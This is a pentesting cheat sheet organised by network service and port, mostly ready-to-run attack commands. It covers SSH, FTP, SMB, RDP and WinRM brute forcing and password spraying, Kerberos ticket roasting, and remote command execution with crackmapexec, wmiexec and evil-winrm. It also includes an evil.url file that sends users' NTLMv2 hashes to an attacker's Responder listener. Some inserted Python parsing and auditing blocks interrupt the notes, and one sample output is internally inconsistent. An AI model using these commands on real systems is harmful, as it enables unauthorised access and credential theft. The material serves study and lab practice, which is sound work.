- Port 21
- Port 22
- Port 23
- Port 25
- Port 80
- Port 88
- Port 110
- Port 111
- Port 139, 445
- Port 143
- Port 161, 162, 10161, 1016 (udp)
- Port 389
- Port 587
- Port 1433
- Port 2375
- Port 3218
- Port 3389
- Port 5672
- Port 5985
- Port 11211
- Port 15672
Note: if nmap is not run with root privileges, use the -sT parameter instead of -sS; otherwise all ports will appear filtered.
nmap -sn -T4 10.0.0.0/24 -oN active-hosts
nmap -sS -sV -vv -Pn -p<PORT> <IP>
nmap -T4 -sS -A -p- <IP>
nmap -T4 -sS -sC -p- -Pn <IP>
nmap -T4 -sC -sV -p- --min-rate=1000 <IP>
nmap -T4 -sUV <IP>
nmap -T4 -A -sUV --top-ports 1000 -Pn <IP>
ls -l /usr/share/nmap/scripts/smb*
masscan -p21,22,443,8000-8100 10.0.0.0/24
knockpy domain.com -w /usr/share/wordlists/list --silent csv -o /path/to/new/folder
usage: knockpy [-h] [-v] [--no-local] [--no-remote] [--no-scan] [--no-http]
[--no-http-code CODE [CODE ...]] [--dns DNS] [-w WORDLIST]
[-o FOLDER] [-t SEC] [-th NUM] [--silent [{False,json,json-pretty,csv}]]
domain
dirb http://10.0.0.1/abc/ /usr/share/wordlists/dirb/big.txt
Extensions worth adding (dirb -X / gobuster -x): .html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl,.ini,.bak,.bck
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/big.txt -t 30 -e -k -x .html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 200 (Length: 1474).
Solution: exclude that response length with --exclude-length <size>
Example: gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 --exclude-length 1474
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 401 (Length: 98).
Solution: exclude the 401 status code as well: -b 404,401
Example: gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 -b 404,401
feroxbuster -u http://10.0.0.1 -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt --threads 30 -C 404,403
OR
feroxbuster -u http://mydomain.com -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt --threads 30 -C 404,403
gobuster fuzz -u http://10.0.0.1/user/FUZZ/condig -w /usr/share/wordlists/dirb/common.txt -e -t 20
ffuf -u http://mywebsite.com -w /usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt -H 'Host: FUZZ.mywebsite.com' -fs 15949
nikto -host=http://example.com
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.0.1 -oX output.xml
searchsploit --nmap output.xml
https://dnsdumpster.com/
https://search.censys.io/
https://crt.sh/
https://archive.org/
https://www.robtex.com/
nmap -p 21 -sV -sC --script="ftp-vuln-*,ftp-anon" 10.0.0.1-254
#Hydra - Password spraying
hydra -s 21 -t 4 -L username.lst -p password01! 10.0.0.1 ftp
#Hydra - Bruteforce specific user
hydra -s 21 -t 4 -l admin -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ftp
#Hydra - Bruteforce common login:password pairs
hydra -s 21 -C /home/kali/wordlists/legion/ftp-betterdefaultpasslist.txt -u -f 10.0.0.1 ftp
#Medusa
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
➤ Connection
ftp 10.0.0.1 21
➤ Upload a file (from the folder where the shell has been started)
binary
put <filename>
➤ Download a file (to the folder where the shell has been started)
binary
get <filename>
ex:
get test.zip
get "Access Control.zip"
➤ 229 Entering Extended Passive Mode (|||26826|)
#Hydra - Bruteforce specific user
hydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ssh
#Hydra - Password spraying
hydra -L user.txt -p password01! 10.0.0.1 ssh
#Hydra - Full bruteforce
hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh
ssh lexis@10.0.0.1
ssh lexis@10.0.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh lexis@10.0.0.1
lexis@10.0.0.1's password:
Last login: Thu Feb 24 08:42:29 2022 from 192.168.1.1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ E R R O R @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The .bash_profile file for the server you are attempting to
connect to has encountered an error. This could mean that
your access has been disabled. Please contact a system
administrator to restore your access to this server.
Connection to 10.0.0.1
ssh -t lexis@10.0.0.1 /bin/sh
lexis@10.0.0.1's password:
sh-05$
chmod 600 id_rsa
ssh -i id_rsa kiosec@10.0.0.1
The login prompt can take a moment to appear (about 1 min)
#From Kali linux
Kiosec@cyberlab:/home/kali>#telnet 10.10.0.1
Trying 10.10.0.1...
Connected to 10.10.0.1.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
login:security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
| Command | Description |
|---|---|
| HELO | Used to initiate an SMTP conversation with an email server. The command is followed by an IP address or a domain name (e.g., HELO 10.1.2.14). |
| EHLO | Used to initiate a conversation with an Extended SMTP (ESMTP) server. Works the same way as HELO, but for ESMTP. |
| STARTTLS | Used to start a secure TLS (Transport Layer Security) connection to an email server. |
| RCPT | Used to specify the recipient's email address. |
| DATA | Used to initiate the transfer of the email message content. |
| RSET | Used to reset (cancel) the current email transaction. |
| MAIL | Used to specify the sender's email address. |
| QUIT | Used to close the connection with the server. |
| HELP | Used to display a help menu (if available). |
| AUTH | Used to authenticate a client to the email server. |
| VRFY | Used to verify whether a user's email mailbox exists. |
| EXPN | Used to request or expand a mailing list on the remote server. |
telnet 10.0.0.1 25
Trying 10.0.0.1
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.local ESMTP Postfix (Debian/GNU)
VRFY {username}
➤ Valid username
252 2.0.0 useradm
➤ Invalid username
550 5.1.1 <admin>: Recipient address rejected:User unknown in local recipient table
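As an added example (not part of these notes), a small parser for SMTP reply lines like the ones above: it joins multi-line replies ("250-" continuation lines), pulls out the enhanced status code (the "5.1.1" part), and labels a VRFY reply the way the notes do. The transcript is constructed, not captured from a real server.

```python
# Added example: parse SMTP server replies (RFC 5321 reply lines with optional
# RFC 3463 enhanced status codes) and interpret the replies to VRFY.
import re

# Constructed server replies, modelled on the VRFY exchange above.
SAMPLE_REPLIES = [
    "220 mail.local ESMTP Postfix (Debian/GNU)",
    "250-mail.local",
    "250-PIPELINING",
    "250 STARTTLS",
    "252 2.0.0 useradm",
    "550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table",
    "502 5.5.1 VRFY command is disabled",
]

# 3-digit code, "-" for a continuation line or " " for the last line, then an
# optional enhanced status code (class.subject.detail) and the free text.
REPLY_LINE = re.compile(r"^(\d{3})([ -])(?:(\d\.\d{1,3}\.\d{1,3})(?: |$))?(.*)$")


def parse_reply_line(line):
    m = REPLY_LINE.match(line)
    if not m:
        raise ValueError(f"not an SMTP reply line: {line!r}")
    code, sep, enhanced, text = m.groups()
    return {"code": int(code), "last": sep == " ", "enhanced": enhanced, "text": text}


def group_replies(lines):
    """Join multi-line replies into one record per server response."""
    replies, current = [], []
    for line in lines:
        parsed = parse_reply_line(line)
        current.append(parsed)
        if parsed["last"]:
            replies.append({
                "code": current[0]["code"],
                "enhanced": current[0]["enhanced"],
                "lines": [p["text"] for p in current],
            })
            current = []
    if current:
        raise ValueError("transcript ends inside a multi-line reply")
    return replies


def vrfy_outcome(reply):
    """Label a reply to VRFY as the notes above do: 2xx = known, 550 = unknown."""
    code = reply["code"]
    if code in (250, 252):
        return "known"      # 252: server will not verify but accepts the address
    if code == 550:
        return "unknown"    # 5.1.1 = bad destination mailbox address
    if code == 502:
        return "disabled"   # VRFY switched off on the server (no enumeration possible)
    return "other"


if __name__ == "__main__":
    for r in group_replies(SAMPLE_REPLIES):
        print(r["code"], r["enhanced"], vrfy_outcome(r), r["lines"])
```

The 502 case is what a hardened server answers; seeing only 502 replies to VRFY is the quickest sign that the enumeration shown above will not work against that host.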
wpscan --url http://10.0.0.1/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --api-token {token-api}
Service : kerberos-sec Microsoft Windows Kerberos
# Install kerbrute : https://github.com/ropnop/kerbrute/releases
# Remember to add the domain to /etc/hosts -> echo '@IP @domain' >> /etc/hosts (example: echo '10.0.0.1 cyberlab.local' >> /etc/hosts)
# Enumerate the user
root@kali:~# kerbrute userenum -d <domain_name> --dc <dns_domain_name> userlist.txt -t 100
Important note: once a list of users has been found, try to obtain the TGT ticket (AS-REP roasting with GetNPUsers.py)
# Password Spraying
root@kali:~# ./kerbrute_linux_amd64 passwordspray -d <domain_name> domain-users.txt Password123
rpcinfo -p 10.0.0.1
rpcclient -U "" 10.0.0.1
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.0.1
enum4linux -A 10.0.0.1
enum4linux 10.0.0.1 -u anonymous
nmap -p 445,139 -Pn --script smb-protocols.nse 10.0.0.1
nmap -v -p 139,445 --script=smb-os-discovery 10.0.0.1
nmap -v -p 139,445 --script=smb* 10.0.0.1
nmap -p 445,139 -Pn --script=smb-vuln-*.nse 10.0.0.1   # does not report every vuln: some scripts need specific args
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.0.0.1
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 10.0.0.1
#Enumerate the shares
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.0.1
smbclient -L \\10.0.0.1
smbclient -L 10.0.0.1 -U anonymous
smbclient -L 10.0.0.1 --options='client min protocol=NT1'
smbclient \\\\10.10.155.41\\<share_name>
smbclient \\\\10.10.155.41\\<share_name> -U username
#Only access a share on which you have at least read permission (check with smbmap first)
#In the example below, HR is a share with read-only permission
root@ip-10-10-148-27:~# smbclient \\\\10.10.155.41\\HR
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHS 0 Sat Sep 15 08:28:48 2018
atlbitbucket D 0 Thu Mar 11 22:53:06 2021
<...>
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Administrator\*
STATUS_STOPPED_ON_SYMLINK listing \All Users\*
STATUS_STOPPED_ON_SYMLINK listing \*
smb: \All Users\>
smbmap -H 10.0.0.1
➤ Recursive enumeration
smbmap -H 10.0.0.1 -r
➤ Recursive enumeration on a specific folder
smbmap -H 10.0.0.1 -R 'Replication\active.htb'
➤ Authenticated enumeration
smbmap -H 10.0.0.1 -u 'SVC_TGS' -p 'mySuperStrongPassword!' -r
➤ Download a file
smbmap -H 10.10.0.1 --download '.\Users\SVC_TGS\Desktop\user.txt'
➤ If the error '[!] Authentication error on 10.0.0.1' appears, try with a fake user: -u '123'
smbmap -H 10.0.0.1 -R -u '123'
If the error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED" appears, it is probably due to the old SMB version on the target.
Solution: intercept the traffic of the command 'smbclient -L \\<IP>' with Wireshark and look at the SMB version negotiation.
smb://<ip>/<folder>
#Example with the folder named anonymous
smbget -R smb://10.0.0.1/anonymous
#Example with a specific file
smbget -r smb://10.0.0.1/folder/file
press enter
mount -t cifs //10.0.0.1/share /mnt/share
mount -t cifs -o "username=user,password=password" //10.0.0.1/share /mnt/share
Lookupsid is a tool that allows you to enumerate user and group Security Identifiers (SIDs) on a Windows system. Each user and group account in Windows has a unique SID, and by obtaining these SIDs, you can gather valuable information about the system's user accounts, aiding in understanding the network's structure and potential security risks. The tool uses the SMB (Server Message Block) protocol, which is commonly used for Windows networking, to facilitate communication.
#Command : python lookupsid.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>
impacket-lookupsid 'mywindows.htb/guest'@mywindows.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: MYWINDOWS\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MYWINDOWS\Administrator (SidTypeUser)
501: MYWINDOWS\Guest (SidTypeUser)
...
1109: MYWINDOWS\Dev Support (SidTypeGroup)
1601: MYWINDOWS\Totoro (SidTypeUser)
1601: MYWINDOWS\Kiosec (SidTypeUser)
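As an added example (not part of these notes or of impacket), here is a parser for the "RID: DOMAIN\Name (SidType)" lines lookupsid prints, plus the SID arithmetic behind it: the full SID of every object is the domain SID followed by its RID, RIDs below 1000 are built-ins Windows assigns regardless of display name, and RIDs from 1000 upwards are allocated per created account. The sample lines are constructed in the same format as the output above; the domain SID is the one printed there.

```python
# Added example: parse lookupsid output, rebuild full SIDs from domain SID + RID,
# and separate built-in accounts (RID < 1000) from per-domain allocated ones.
import re

# Domain SID taken from the lookupsid output above.
DOMAIN_SID = "S-1-5-21-917908876-1423158569-3159038727"

# Constructed sample lines in lookupsid's "RID: DOMAIN\Name (SidType)" format.
SAMPLE_OUTPUT = r"""498: MYWINDOWS\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MYWINDOWS\Administrator (SidTypeUser)
501: MYWINDOWS\Guest (SidTypeUser)
512: MYWINDOWS\Domain Admins (SidTypeGroup)
1109: MYWINDOWS\Dev Support (SidTypeGroup)
1601: MYWINDOWS\Totoro (SidTypeUser)
"""

# Well-known RIDs and the default name of the object that owns them.
WELL_KNOWN_RIDS = {
    498: "Enterprise Read-only Domain Controllers",
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

ENTRY_RE = re.compile(r"^(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")


def parse_lookupsid_output(text):
    """One dict per 'RID: DOMAIN\\Name (SidType)' line; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            rid, domain, name, sid_type = m.groups()
            entries.append({"rid": int(rid), "domain": domain, "name": name, "sid_type": sid_type})
    return entries


def full_sid(domain_sid, rid):
    """Full object SID = domain SID + '-' + RID."""
    if not DOMAIN_SID_RE.match(domain_sid):
        raise ValueError(f"not a domain SID: {domain_sid}")
    return f"{domain_sid}-{rid}"


def custom_accounts(entries):
    """Objects created in this domain: RIDs 1000 and above."""
    return [e for e in entries if e["rid"] >= 1000]


def renamed_builtins(entries):
    """Built-in objects whose display name differs from the default (e.g. a renamed Administrator)."""
    return [e for e in entries
            if e["rid"] in WELL_KNOWN_RIDS and e["name"] != WELL_KNOWN_RIDS[e["rid"]]]


if __name__ == "__main__":
    for e in parse_lookupsid_output(SAMPLE_OUTPUT):
        print(full_sid(DOMAIN_SID, e["rid"]), e["name"], e["sid_type"])
```

Because the RID is fixed, renaming the built-in Administrator does not hide it: renamed_builtins() spots any RID-500 object whose name is no longer "Administrator", which is the check a defender can run on the same output.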
hydra -L users.txt -P passs.txt smb://10.0.0.1 -t 4
hydra -L username.txt -P password.txt 10.0.0.1 smb -V
crackmapexec smb <IP> -d <DOMAIN> -u users.txt -p 'PASSWORD'
→ EX: crackmapexec smb 10.0.0.1 -d frabricorp -u users.txt -p '123Soleil'
STATUS_PASSWORD_MUST_CHANGE : correct password but has expired and needs to be changed before logging in
STATUS_LOGIN_FAILURE : incorrect password
➤ Prerequisite : Write access to a smb folder
Check whether it is possible to write to a folder:
- echo "this is a test" >> test.txt
- upload the file in the smb folder using put command
➤ Create the evil.url file
Write the following content to a file named evil.url. Replace <YOUR tun0 IP> with the IP address of your interface (tun0, eth0, etc.).
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=abcdef
IconFile=\\<YOUR tun0 IP>\%USERNAME%.icon
IconIndex=1
➤ Prepare the responder listener
sudo responder -I tun0 -wv
➤ Put evil.url in the SMB share and wait for the NTLMv2 hash, which arrives when the file is opened
ex :
[SMB] NTLMv2-SSP Client : 192.168.58.172
[SMB] NTLMv2-SSP Username : CYBERLAB\kiosec
[SMB] NTLMv2-SSP Hash : kiosec::CYBERLAB:09de3ec911a58870:0D4F3A68A10DAADDF7B4382A16916822:01010000000000000059D801EE14DC013815FA61C58073A80000000002000[REDACTED]0000010000000020000089AA92A8AA17227674842877BD92C0EEF101C15360BF57E99844B804AA2DA3E00A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00350038000000000000000000
Keep in file only:
kiosec::CYBERLAB:09de3ec911a58870:0D4F3A68A10DAADDF7B4382A16916822:01010000000000000059D801EE14DC013815FA61C58073A80000000002000[REDACTED]0000010000000020000089AA92A8AA17227674842877BD92C0EEF101C15360BF57E99844B804AA2DA3E00A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00350038000000000000000000
➤ Try to crack the hash
See : https://github.com/Kiosec/Cracking/blob/main/README.md#netntlmv2ntlmv2-hash
➤ Using snmpbulkwalk
$ snmpbulkwalk -c public -v2c 10.0.0.1 .
➤ Using snmp-check (preferred, to detect vulnerable running services)
#Example with clamav:
kali@kali:~$ snmp-check 10.0.0.1
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.0.0.1 using SNMPv1 and community 'public'
[...]
3765 runnable clamd /usr/local/sbin/clamd
3767 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3776 runnable inetd /usr/sbin/inetd
nmap -n -sV --script "ldap* and not brute" <IP>
Explanation : https://blog.netwrix.com/2022/12/13/using-ldap-ping-to-enumerate-active-directory-users/ Github : https://github.com/lkarlslund/ldapnomnom
┌─[✗]─[root@htb-tuswhlsdcc]─[/home/kiosec/Documents]
└──╼ #./ldapnomnom-linux-x64 --input xato-net-10-million-usernames.txt --server test.com --maxservers 32 --parallel 16
__ ____ _____ _____
| | | \| _ | _ |___ ___ _____ ___ ___ _____
| |__| | | | __| | . | | | . | |
|_____|____/|__|__|__| |_|_|___|_|_|_|_|_|___|_|_|_|
prerelease
IN SPACE NO ONE CAN HEAR YOU NOM NOM USERNAMES
guest
administrator
nxc ldap 10.129.219.77 -u '' -p '' --users
# With Credentials
ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>
# Without credentials
ldapdomaindump ldap://<IP>
➤ Anonymous connection attempt (-x). With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -h 10.129.136.235 -p 389 -x -b "dc=htb,dc=local"
ldapsearch -H ldap://machine.htb:389/ -x -s base -b '' "(objectClass=*)" "*" +
➤ Enumerate all AD users (https://github.com/ropnop/windapsearch)
./windapsearch.py -d test.com --dc-ip 10.0.0.1 -U
➤ Enumerate all objects in the domain
./windapsearch.py -d test.com --dc-ip 10.0.0.1 --custom "objectClass=*"
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The alfresco service account has Kerberos pre-authentication disabled, which means we can request the encrypted TGT for this user.
➤ Request a TGT ticket
./GetNPUsers.py DOMAIN/USERNAME -dc-ip <IP> -no-pass
➤ Next steps: crack the obtained TGT ticket, then reuse the recovered credentials on port 5985 with evil-winrm
➤ Authenticated research. With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -x -h <IP> -p <PORT> -D 'USERNAME' -w 'PASSWORD' -b "dc=DOMAIN,dc=DOMAIN2" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
OR
./GetADUsers.py -all DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetADUsers.py -all domain.com/svc_tgs -dc-ip 10.0.0.1
OR
windapsearch.py -u "DOMAIN\USERNAME" --dc-ip <IP> -U
→ EX: ./windapsearch.py -u "FABRICORP\harry" --dc-ip 10.10.10.193 -U
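As an added example (not part of these notes), here is what the userAccountControl part of the filters above actually does. userAccountControl is a bit field; the matching rule 1.2.840.113556.1.4.803 is a bitwise AND, so "(!(userAccountControl:1.2.840.113556.1.4.803:=2))" keeps only accounts whose ACCOUNTDISABLE bit is clear, and the pre-authentication condition used for the TGT request above is another bit (DONT_REQ_PREAUTH) in the same field. The account list is constructed for the example; the flag values are Microsoft's documented ones.

```python
# Added example: decode userAccountControl and reproduce what the LDAP filter
# "(!(userAccountControl:1.2.840.113556.1.4.803:=2))" above selects.
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH": 0x400000,
}

# Constructed sample of the two attributes the ldapsearch above would return;
# the values are made up for the example.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 4260352},  # 512 + 65536 + 4194304
    {"sAMAccountName": "harry", "userAccountControl": 512},
    {"sAMAccountName": "old-contractor", "userAccountControl": 514},    # 512 + 2 (disabled)
    {"sAMAccountName": "backup-svc", "userAccountControl": 66080},      # 512 + 65536 + 32
]


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, in bit order."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def bit_and_match(value, mask):
    """Semantics of matching rule 1.2.840.113556.1.4.803: every bit of mask is set in value."""
    return (value & mask) == mask


def enabled_users(accounts):
    """What the (!(...:=2)) clause keeps: accounts without ACCOUNTDISABLE."""
    return [a["sAMAccountName"] for a in accounts
            if not bit_and_match(a["userAccountControl"], UAC_FLAGS["ACCOUNTDISABLE"])]


def preauth_disabled(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH, the condition the TGT request above relies on."""
    return [a["sAMAccountName"] for a in accounts
            if not bit_and_match(a["userAccountControl"], UAC_FLAGS["ACCOUNTDISABLE"])
            and bit_and_match(a["userAccountControl"], UAC_FLAGS["DONT_REQ_PREAUTH"])]


def risky_settings(accounts):
    """Per enabled account, the flags a domain audit usually wants removed."""
    watch = ("PASSWD_NOTREQD", "DONT_REQ_PREAUTH", "TRUSTED_FOR_DELEGATION")
    out = {}
    for a in accounts:
        flags = decode_uac(a["userAccountControl"])
        if "ACCOUNTDISABLE" in flags:
            continue
        hits = [f for f in flags if f in watch]
        if hits:
            out[a["sAMAccountName"]] = hits
    return out


if __name__ == "__main__":
    for a in SAMPLE_ACCOUNTS:
        print(a["sAMAccountName"], a["userAccountControl"], decode_uac(a["userAccountControl"]))
    print("pre-auth disabled:", preauth_disabled(SAMPLE_ACCOUNTS))
    print("to review:", risky_settings(SAMPLE_ACCOUNTS))
```

The same bitwise rule with mask 4194304 (0x400000) is the LDAP filter that finds pre-auth-disabled accounts server-side, which is what the GetNPUsers.py call above does behind the scenes.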
➤ Verify if a SPN exist
ldapsearch -x -h 10.0.0.1 -p 389 -D 'SVC_TGS' -w 'password' -b "dc=domain,dc=com" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
OR
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1
→ OUTPUT: active/CIFS:445 -> a SPN exist
➤ Request a SPN token
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP> -request
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1 -request
➤ Wmiexec equivalent to psexec
./wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
→ EX: ./wmiexec.py domain.com/administrator:password@10.0.0.1
sqsh -U sa -P password -S 10.0.0.1:1433 -D mydb
go -m pretty
Default docker port
nmap -sV -p 2375 10.0.0.1
curl http://10.0.0.1:2375/version
{
"Platform": {
"Name": "Docker Engine - Community"
},
"Components": [
{
"Name": "Engine",
"Version": "20.10.20",
"Details": {
"ApiVersion": "1.41",
"Arch": "amd64",
"BuildTime": "2022-10-18T18:18:12.000000000+00:00",
"Experimental": "false",
"GitCommit": "03df974",
"GoVersion": "go1.18.7",
"KernelVersion": "5.15.0-1022-aws",
"MinAPIVersion": "1.12",
"Os": "linux"
}]
}
# To test if we can run commands, we'll list the containers on the target
docker -H tcp://10.0.0.1:2375 ps
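As an added example (not part of these notes or of Docker), here is the defender's side of the same finding: a check over a daemon.json that flags any tcp:// listener reachable the way port 2375 is above, with the weak configuration next to a hardened one, plus a helper that pulls the engine and API version out of a /version reply. Both configs and the /version sample are constructed; the daemon.json keys used (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are Docker's own.

```python
# Added example: audit a Docker daemon.json for an unauthenticated API listener
# like the one on port 2375 above, and summarise the /version reply.
import json

# Constructed configs: the weak one exposes the API exactly as the curl above shows.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

# Constructed /version reply, trimmed from the one captured above.
VERSION_JSON = """{
  "Platform": {"Name": "Docker Engine - Community"},
  "Components": [{"Name": "Engine", "Version": "20.10.20",
                  "Details": {"ApiVersion": "1.41", "Os": "linux"}}]
}"""

CERT_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(text):
    """One finding per tcp:// listener that does not require a client certificate."""
    cfg = json.loads(text)
    findings = []
    tls = bool(cfg.get("tls", False))
    tlsverify = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are guarded by file permissions
        if not (tls or tlsverify):
            findings.append(f"{host}: API exposed over plaintext TCP with no authentication")
        elif not tlsverify:
            findings.append(f"{host}: TLS enabled but client certificates are not verified (set tlsverify)")
        elif any(k not in cfg for k in CERT_KEYS):
            findings.append(f"{host}: tlsverify set but one of {CERT_KEYS} is missing")
    return findings


def engine_version(version_text):
    """(engine version, API version) from a /version reply, or (None, None)."""
    data = json.loads(version_text)
    for comp in data.get("Components", []):
        if comp.get("Name") == "Engine":
            return comp.get("Version"), comp.get("Details", {}).get("ApiVersion")
    return None, None


if __name__ == "__main__":
    print(audit_daemon_config(WEAK_DAEMON_JSON))
    print(audit_daemon_config(HARDENED_DAEMON_JSON))
    print(engine_version(VERSION_JSON))
```

Anything the audit flags is a host on which the "docker -H tcp://..." command above works for anyone who can reach the port; the fix is the hardened block (tlsverify plus the three certificate paths), not just moving the listener to 2376.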
Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support. (Quoted from the Wikipedia article on Squid.)
Alternatively, the SPOSE scanner (Squid Pivoting Open Port Scanner, https://github.com/aancw/spose) can be used.
git clone https://github.com/aancw/spose.git
python spose.py --proxy http://$IP:3128 --target $IP
FoxyProxy can be configured in the browser to reach other ports through the proxy (e.g., 8080).
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.0.1
hydra -L user.txt -P pass.txt 10.0.0.1 rdp
ncrack -vv --user administrator -P passwords.txt rdp://10.0.0.1,CL=1
rdesktop 10.0.0.1
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info 10.0.0.1
import amqp  # py-amqp client: pip install amqp

# Open an AMQP connection and print the broker's server properties (product, version, platform, ...)
conn = amqp.connection.Connection(host="10.0.0.1", port=5672, virtual_host="/")
conn.connect()
for k, v in conn.server_properties.items():
    print(k, v)
Details : https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Check a pair of credentials (Password) and execute a command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Check a pair of credentials (Hash) and execute a PS command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i <IP> -u <USERNAME> -p <PASSWORD>
OR
gem evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>
ex:
evil-winrm -i 10.0.0.1 -u svc-securiry --password 'mystr0ngpasssword!'
nmap -n -sV --script memcached-info -p 11211 10.0.0.1
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
